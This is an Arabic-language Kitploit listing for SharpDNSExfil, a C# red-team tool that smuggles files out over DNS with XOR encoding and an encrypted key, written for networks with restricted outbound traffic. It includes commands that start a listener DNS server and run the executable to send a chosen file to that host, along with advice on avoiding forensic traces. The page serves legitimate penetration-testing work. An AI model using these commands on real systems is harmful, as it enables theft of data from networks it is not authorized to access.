Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SharpDNSExfil — أداة بلغة C# لتهريب الملفات عبر DNS باستخدام تشفير XOR والتشفير غير المتماثل، مصممة لعمليات الفريق الأحمر مع اتصالات صادرة مقيدة. | Kitploit
أدوات/GitHubGitHub/aniqfakhrul/sharpdnsexfil
أدوات التشفير/فك التشفيرتسريب البياناتالقيادة والسيطرةالفريق الأحمرتحليل DNS
GitHubaniqfakhrul/sharpdnsexfil

SharpDNSExfil

أداة بلغة C# لتهريب الملفات عبر DNS باستخدام تشفير XOR والتشفير غير المتماثل، مصممة لعمليات الفريق الأحمر مع اتصالات صادرة مقيدة.

عرض المستودع
13215منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SharpDNSExfil

SharpDNSExfil هي أداة تسريب (exfiltration) مكتوبة بلغة C#. الهدف الأساسي هو تسريب أي ملفات "موجودة على القرص" دون الحاجة للقلق بشأن اتصالات الخروج المقيدة.

المتطلبات الأساسية

  • يجب أن تكون الآلة البعيدة قادرة على حل أسماء DNS

لماذا فعلت هذا؟

حصلت على RCE أعمى أثناء مهامي، واتضح أن الآلة البعيدة لديها حماية جدار ناري لا تسمح بالاتصالات الصادرة مما جعل الأمر صعبًا للحصول على اتصال عكسي. الشيء الجيد هو أن خادم DNS يمكنه حل أسماء النطاقات العامة والوصول إلي عبر DNS. المشكلة أنني ما زلت لم أستطع الحصول على شيل عكسي، استطعت قراءة بعض المخرجات الصغيرة، لكن لا فائدة. لذا جاءتني فكرة أتمتة العملية عبر DNS فقط وتكرار جميع الخطوات، وأخيرًا نجح الأمر!

تحذير: تم اختبار العملية بأكملها فقط عبر خادم DNS عام مخصص لكن لم يتم اختبارها بالكامل في بيئة شركات حقيقية. لذا استخدمه على مسؤوليتك الخاصة!

TL;DR: كيف تستخدمه

ما الذي يجب مراعاته؟

جميع البايتات المسربة يتم تطبيق XOR عليها بمفتاح عشوائي. قد تعتقد أن المفتاح سيكون نصًا عاديًا على مستوى الشبكة (سيراه Wireshark). مع خيار --encrypt، يأتي دور التشفير غير المتماثل، حيث يقوم مفتاح عام ثابت بتشفير مفتاح XOR. الجهاز المحلي (أنت) يتوقع استلام مفتاح مشفر، وسيقوم سكريبت Python تلقائيًا بفك تشفير المفتاح باستخدام المفتاح الخاص الثابت. باقي البيانات المرسلة ستخضع لـ XOR لتعيدها إلى بايتاتها الأصلية. لذا، قم دائمًا بتغيير أزواج المفاتيح من فضلك

قبل التشفيربعد التشفير

الاستخدام

  • قم بإعداد خادم DNS باستخدام سكريبت dnsserver.py بلغة Python. الخيارات كالتالي
root@kitploit:~
python3 dnserver.py --udp --port 53 --host 192.168.0.102
  • قم بتشغيل الملف التنفيذي على الآلة البعيدة.
root@kitploit:~
SharpDNSExfil.exe --file C:\path\to\file --server 192.168.0.102

اعتبارات أمنية (OPSEC)

خطوات وعمليات SharpDNSExfil يجب أن تُنفذ جميعها في الذاكرة دون لمس القرص لتجنب ترك بقايا أثناء المهام. سيقوم SharpDNSExfil بإعلامك بكل خطوة أو عملية يقوم بها في الخلفية مع خيار --verbose. كل بايت يتم إرساله يتم ترميزه بـ XOR وسيتم تشفير المفتاح أيضًا بتشفير غير متماثل لتجنب وجود المفتاح كنص عادي في حركة الشبكة. كن حذرًا للغاية وقم دائمًا بتدوين الملاحظات ونظف ممتلكات العميل.

الشكر والإسناد

  • سكريبت DNSServer الرائع من @pklaus
تنزيل الأداة